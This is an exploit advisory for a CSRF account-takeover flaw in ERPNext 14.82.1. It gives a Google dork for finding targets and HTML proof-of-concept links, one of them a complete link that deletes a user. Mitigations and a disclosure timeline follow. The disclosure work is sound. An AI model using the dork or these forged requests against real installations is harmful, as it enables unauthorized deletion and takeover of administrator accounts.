# Exploit Title: ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)
# Google Dork: inurl:"/api/method/frappe"
# Date: 2025-04-29
# Exploit Author: Ahmed Thaiban (Thvt0ne)
# Vendor Homepage: https://erpnext.com
# Software Link: https://github.com/frappe/erpnext
# Version: <= 14.82.1, 14.74.3 (Tested)
# Tested on: Linux (Ubuntu 20.04), Chrome, Firefox.
# CVE : CVE-2025-28062
# Category: WebApps
# Description:
A Cross-Site Request Forgery (CSRF) vulnerability Lead to Account Takeover exists in ERPNext 14.82.1 and 14.74.3. This flaw allows an attacker to perform unauthorized state-changing operations on behalf of a logged-in administrator without their knowledge or consent.
Affected endpoints include:
- /api/method/frappe.desk.reportview.delete_items
- /api/method/frappe.desk.form.save.savedocs
Impact:
- Deletion of arbitrary users
- Unauthorized role assignment
- Account takeover via password change
The application fails to enforce CSRF tokens on administrative API requests, violating OWASP recommendations.
---
# PoC 1: Delete a User
<html>
<body>
<h2>Delete User</h2>
<a href="http://target/api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User">
Click Here
</a>
</body>
</html>
---
# PoC 2: Assign Role
<html>
<body>
<h2>Assign Role to User</h2>
<a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
Add Role
</a>
</body>
</html>
---
# PoC 3: Reset Password
<html>
<body>
<h2>Reset User Password</h2>
<a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
Reset Password
</a>
</body>
</html>
---
# Mitigation:
- Enforce CSRF protection for all administrative endpoints
- Require POST methods for state changes
- Mark cookies as SameSite=Strict
- Implement re-authentication for critical user changes
---
# Disclosure Timeline:
- 2025-02-09: Vulnerability discovered
- 2025-02-10: Reported to Frappe (no response)
- 2025-04-29: Public disclosure via CVE + advisory
---
# Author Contact:
LinkedIn: https://linkedin.com/in/ahmedth
GitHub: https://github.com/Thvt0ne
# References:
- https://owasp.org/www-community/attacks/csrf